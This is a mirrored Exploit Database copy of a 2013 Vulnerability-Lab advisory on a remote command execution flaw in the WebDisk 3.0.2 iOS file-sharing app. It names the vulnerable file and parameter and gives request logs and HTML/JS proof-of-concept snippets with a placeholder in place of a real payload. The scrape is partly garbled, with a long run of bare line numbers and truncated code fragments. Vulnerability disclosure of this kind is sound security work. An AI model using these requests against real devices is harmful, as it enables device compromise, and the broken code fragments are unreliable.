WebDisk 3.0.2 PhotoViewer iOS – Command Execution

Exploit Database
163 阅读

作者： Vulnerability-Lab

日期： 2013-07-29
类别：
- webapps
平台：
- ios
来源：https://www.exploit-db.com/exploits/27189/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

Title:

======

WebDisk 3.0.2 PhotoViewer iOS - Command Execution Vulnerability

Date:

=====

2013-07-27

References:

===========

http://www.vulnerability-lab.com/get_content.php?id=1035

VL-ID:

=====

1035

Common Vulnerability Scoring System:

====================================

8.8

Introduction:

=============

WebDisk lets your iphone/ipad become a file website over wi-fi netwrk.You can upload/download your document

to your iphone/ipad on your pc browser over wi-fi and it is also a document viewer. Lets you direct view

your document on your iphone/iphone.

( Copy of the Homepage: https://itunes.apple.com/us/app/webdisk/id546221210 )

Abstract:

=========

The Vulnerability Laboratory Research Team discovered a remote code execution vulnerability in the WebDisk v3.0.2 application (Apple iOS - iPad & iPhone).

Report-Timeline:

================

2013-07-27:Public Disclosure (Vulnerability Laboratory)

Status:

========

Published

Affected Products:

==================

Apple AppStore

Product: WebDisk PhotoViewer - Application 3.0.2

Exploitation-Technique:

=======================

Remote

Severity:

=========

Critical

Details:

========

A remote command execution web vulnerability is detected in the WebDisk v3.0.2 application (Apple iOS - iPad & iPhone).

The vulnerability allows remote attacker to execute code inside of a vulnerable web application module to compromise the device.

The vulnerability is located in the afgetdir.ma file when processing to request manipulated path parameters. Remote attackers can

execute code from the main application index by using the upload input field. The code inside of the file upload field does not

require to choose a file for an upload but executes the context directly via GET variable. The result is a web application code

execution from the main index module. The code will be executed from the listing location under the upload input field of the

webdisk wifi application.

Exploitation of the vulnerability does not require user interaction or a privilege application user account.

Successful exploitation results webdisk web-application or apple device compromise via remote code execution.

Vulnerable Module(s):

[+] Upload - Input Field

Vulnerable File(s):

[+] afgetdir.ma

Vulnerable Parameter(s):

[+] p (path)

Affected Module(s):

[+] Index File Dir Listing

Proof of Concept:

=================

The remote command execution vulnerability can be exploited by remote attackers without privilege application user account or

user interaction. For demonstration or reproduce ...

--- Exploitation Request Session Logs ---

Status: 200[OK]

GET http://192.168.2.104:1861/aadd.htm

Load Flags[LOAD_BACKGROUND] Content Size[641] Mime Type[application/x-unknown-content-type]

Request Headers:

Host[192.168.2.104:1861]

User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]

Accept-Language[en-US,en;q=0.5]

Accept-Encoding[gzip, deflate]

DNT[1]

Referer[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C]

Connection[keep-alive]

Response Headers:

Content-Length[641]

Server[MHttpServer/1.0.0]

Status: 200[OK]

GET http://192.168.2.104:1861/[CODE EXECUTION]+PATH

Load Flags[LOAD_DOCUMENT_URI]

Content Size[0]

Mime Type[application/x-unknown-content-type]

Request Headers:

Host[192.168.2.104:1861]

User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]

Accept-Language[en-US,en;q=0.5]

Accept-Encoding[gzip, deflate]

DNT[1]

Referer[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C]

Connection[keep-alive]

Response Headers:

Content-Length[0]

Server[MHttpServer/1.0.0]

URL=http://192.168.2.104:1861/afgetthum.ma?p=%5Cvar%5Cmobile%5CApplications

%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C[CODE EXECUTION]

Status: 200[OK]

GET http://192.168.2.104:1861/afgetthum.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CW%5C[CODE EXECUTION]

Load Flags[LOAD_NORMAL] Content Size[20217] Mime Type[application/x-unknown-content-type]

Request Headers:

Host[192.168.2.104:1861]

User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]

Accept[image/png,image/*;q=0.8,*/*;q=0.5]

Accept-Language[en-US,en;q=0.5]

Accept-Encoding[gzip, deflate]

DNT[1]

Referer

[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C]

Connection[keep-alive]

Response Headers:

Content-Length[20217]

Server[MHttpServer/1.0.0]

--- Exploitation Request Session Logs ---

Reference(s): mHTTP Web-Server

http://localhost:1861/

http://localhost:1861/mjs.js

http://localhost:1861/aadd.htm

http://localhost:1861/afgetthum.ma

PoC Example:

[HOST]:[PORT]/[FILE].[MA]?[PARAM Q]=%5C[PATH VAR]/[DIRECTION]%5C[ID]%5C[DOCUMNETS PATH]%5C[LIBRARY FOLDER]%5C[LOCAL PATH WDisk]%5C[COMMAND EXECUTION]

PoC Link:

http://localhost:1861/afgetthum.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C[COMMAND EXECUTION]

PoC: Exploit 1 - HTML

<html>

<head><body><title>WebDisk v3.0.2 - Command Execution Vulnerability - Remote PoC</title>

56%5CDocuments%5CLibrary%5CWD%5C[COMMAND EXECUTION] width=800 height=800>

</body></head>

<html>

PoC: Exploit 2 - JS

-%20Remote%20PoC%3C/title%3E%0A%3Ciframe%20src%3Dhttp%3A//localhost%3A1861/afgetthum.ma%3Fp%3D%255Cvar%255Cmobile%255CApplications

%255C8D137E49-3793-4C45-9A50-B8AF3AE7EA%0A56%255CDocuments%255CLibrary%255CWD%255C%5BCOMMAND%20EXECUTION%5D%20width%3D800%20height%3D800

%3E%0A%3C/body%3E%3C/head%3E%0A%3Chtml%3E';d=unescape(m);document.write(d);</script>

Review Source: tdmid

</tr>

<tr>

<td class="tdmid">>"[CODE EXECUTION VULNERABILITY!]</td>

<td class="tdright">7-26 19:51<br/><br/><a href="https://www.exploit-db.com/exploits/27189/afdelete.ma?p=%5Cvar%5Cmobile%5CApplications

%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C%7C-%7C430429876.txt">delete</a></td>

</tr>

<tr>

</tr>

Solution:

=========

To fix the command execution parse the p variable and encode the input on direct GET requests.

Parse and encode the output listing of the file input in the main file dir index module.

Risk:

=====

The security risk of the remote command execution web application vulnerability is estimated as critical.

Credits:

========

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)

Disclaimer:

===========

The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,

either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-

Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business

profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some

states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation

may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases

or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com

Contact:admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com

Section:www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com

Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.

Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other

media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and

other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),

modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

VULNERABILITY LABORATORY RESEARCH TEAM

DOMAIN: www.vulnerability-lab.com

CONTACT: research@vulnerability-lab.com